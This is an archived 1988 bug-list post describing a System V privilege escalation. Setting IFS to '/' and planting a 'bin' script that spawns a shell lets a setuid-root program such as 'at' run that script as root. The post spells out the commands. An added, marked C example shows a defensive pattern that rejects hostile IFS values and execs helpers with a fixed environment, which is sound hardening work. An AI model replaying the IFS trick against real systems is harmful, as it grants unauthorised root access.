A security hole
Uwe Mager
jum at cosmo.UUCP
Fri Mar 11 11:30:22 AEST 1988
In article <478 at minya.UUCP> jc at minya.UUCP (John Chambers) writes:
...
>
>Anyhow, what can one do with getcwd() or popen() within a setuid program
>(root or otherwise) that isn't a consequence of the search path? If there
>is a real security hole here, I'd be very interested in reading about it.
There is a nice hack to make the sh misunderstand the path variable.
For example the following will work on most SYSV machines:
in file named ``bin'' in your cwd:
IFS=" \t\n" # escapes for readability
/bin/sh </dev/tty >/dev/tty 2>&1
pwd
and now from a command line:
IFS="/"; export IFS
at now + 1 minute # or any setuid root containing getcwd
This will not work with the Korn shell; there is a special check for IFS.
--
Jens-Uwe Mager
jum at focus.UUCP || jum at cosmo.UUCP
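Added example, not part of the original post and not code from its author: a defensive pattern for a setuid program that needs to run a helper command. The post shows that a caller-controlled IFS changes how an old Bourne shell tokenises the string that popen()/system() hand it, so a relative name in the caller's cwd can end up running with the program's privileges. The code below does the opposite of what the attack needs: it checks IFS the way the Korn shell's special check does, never passes the caller's environment on, and execs an absolute path directly instead of going through /bin/sh. The function names, the fixed PATH value and the sample environment blocks are this example's own choices.

```c
/*
 * Hardening pattern for a privileged program that must run a helper.
 * Added example; the names and the fixed PATH below are assumptions of
 * this example, not taken from the original post.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Whitespace-only IFS (or unset) is what the Korn shell's check accepts;
 * anything else, e.g. "/" as in the post, is treated as hostile. */
int ifs_is_safe(const char *ifs)
{
    if (ifs == NULL)
        return 1;
    for (; *ifs; ifs++)
        if (*ifs != ' ' && *ifs != '\t' && *ifs != '\n')
            return 0;
    return 1;
}

/* Scan an environment block (NULL-terminated "NAME=value" strings) and
 * report whether it carries an IFS that could alter shell word splitting. */
int env_has_unsafe_ifs(char *const envp[])
{
    for (size_t i = 0; envp[i] != NULL; i++)
        if (strncmp(envp[i], "IFS=", 4) == 0 && !ifs_is_safe(envp[i] + 4))
            return 1;
    return 0;
}

/* The environment the privileged child actually receives: a fixed PATH and
 * nothing inherited, so IFS, ENV and the like from the caller are gone. */
static char *const safe_envp[] = {
    "PATH=/bin:/usr/bin",
    NULL
};

/* Number of unsafe IFS entries in the fixed block (always 0; kept as a
 * function so the property can be checked rather than assumed). */
int safe_env_unsafe_count(void)
{
    return env_has_unsafe_ifs(safe_envp);
}

/* Run an absolute-path helper with argv under the fixed environment,
 * bypassing /bin/sh entirely.  Returns the child's exit status, or -1
 * for a relative path (PATH-dependent lookups are refused) or on error. */
int run_helper(const char *abs_path, char *const argv[])
{
    if (abs_path[0] != '/')
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(abs_path, argv, safe_envp);
        _exit(127);                 /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    char *const pwd_argv[] = { "pwd", NULL };
    /* constructed sample: the environment the post's command line sets up */
    char *hostile[] = { "IFS=/", "PATH=.", NULL };

    printf("caller IFS safe: %d\n", ifs_is_safe(getenv("IFS")));
    printf("hostile env flagged: %d\n", env_has_unsafe_ifs(hostile));
    printf("helper exit status: %d\n", run_helper("/bin/pwd", pwd_argv));
    return 0;
}
```

The check in ifs_is_safe() is only a detector; the real protection is that run_helper() hands the child a fixed environment and an absolute path, so nothing the caller exported, IFS or PATH, can influence which program runs.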
More information about the Comp.bugs.sys5 mailing list